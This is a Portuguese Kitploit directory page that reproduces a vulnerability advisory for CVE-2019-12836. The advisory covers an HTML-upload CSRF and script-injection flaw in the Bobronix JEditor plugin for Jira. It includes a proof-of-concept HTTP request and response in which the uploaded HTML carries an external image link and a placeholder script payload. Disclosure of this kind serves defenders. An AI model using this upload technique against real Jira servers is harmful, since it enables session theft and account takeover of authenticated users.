Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-12836 — CVE-2019-12836 | Kitploit
Ferramentas/GitHubGitHub/9lyph/cve-2019-12836
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHub9lyph/cve-2019-12836

CVE-2019-12836

CVE-2019-12836

Ver Repositório
712há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-12836

bobronix

Aplicação

JEditor v3.0.5 - Editor WYSIWYG para JIRA

Editor de texto rico simples mas poderoso para Jira. Importe emails HTML, cole conteúdos ricos, crie modelos e pré-popule campos.

Fornecedor do Produto

Bobronix

Site do Fornecedor

http://bobronix.com/

Referência CVE

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12836

Código Base do Produto Afetado

JEditor - Editor WYSIWYG para Jira - v3.0.5

Componente Afetado

JEditor v3.0.5

Descrição

O editor Bobronix JEditor antes da v3.0.6 para Jira permite que um atacante adicione uma URL/Link (a um problema existente) que pode causar a falsificação de uma requisição para um domínio de origem externa. Isso, por sua vez, pode permitir uma requisição falsificada que pode ser invocada no contexto de um usuário autenticado, levando ao roubo de tokens de sessão e à tomada de conta.

O JEditor v3.0.5 permite o upload de arquivos de vários tipos de extensão, um dos quais é '.HTML'. O JEditor é utilizado pelo JIRA para sua funcionalidade de upload de arquivos. Usando essa funcionalidade, um atacante pode carregar conteúdo malicioso.

Uma vez que o conteúdo malicioso é carregado, uma requisição subsequente pode ser feita para o conteúdo, o que permite a exibição e renderização inline do conteúdo no contexto do navegador de qualquer usuário autenticado. Isso pode permitir que um atacante falsifique uma requisição maliciosa em nome de qualquer usuário autenticado.

Tipo de Vulnerabilidade

Falsificação de Solicitação entre Sites (CSRF)

Informações Adicionais

Bug corrigido no JEditor v3.0.6

https://jeditor.zendesk.com/hc/en-us/articles/360029430751-JEditor-3-0-6-release-notes

Outro Impacto CVE

Permite uma requisição falsificada resultando em uma possibilidade de vetor de ataque no lado do cliente

Vetores de Ataque

Usuário autenticado é necessário para interagir com o link/URL incorporado

Descobridor

Crédito: Victor Hanna (Exploit Security)

POC

Exemplo de Requisição HTTP
root@kitploit:~
GET /plugins/servlet/jeditor_file_provider?imgId=ckupload201906162566696393384747423&fileName=C%3A%5Ctemp%5CPOC.html HTTP/1.1
Host: <vulnerable host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0)
Accept: text/html,application/xhtml_xml,application/xml;q=0.9,*/*;q=0.8
Accept-Langauge: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<vulnerable host>/secure/Dashboard.jspa
DNT: 1
Connection: close
Cookie: atlassian.xsrf.token=BNXD-VY4I-RCJA-J3YA_34d13dd7fae0f32023fc89838ldc0b6c35991382_lin; JSESSION=42E9F5581BAE499E3E9E45B9D44E6F3C
Upgrade-Insecure-Requests: 1
Exemplo de Resposta HTTP
root@kitploit:~
HTTP/1.1 200
Server: nginx/1.10.2
Date: Sun, 16 Jun 2019 03:06:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-AREQUESTID: 786x226666x1
X-ASESSIONID: pn6xpm
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-ASEN: SEN-2322842
X-Seraph-LoginReason: OK
X-AUSERNAME:
Content-Disposition: inline; filename="C:\temp\POC.html"
Vary: User-Agent
Content-Length: 236

<html>
<head>
<img src="http://{insert external image location here}">
<script>{JS Payload of any description}</script>
</head>
<body>
<h1>
 Welcome to the Jungle !
</h1>
</body>
</html>

Descobridor/Crédito

Victor Hanna da Exploit Security

Siga-me em

Mastodon Linkedin Youtube

Baixar ferramenta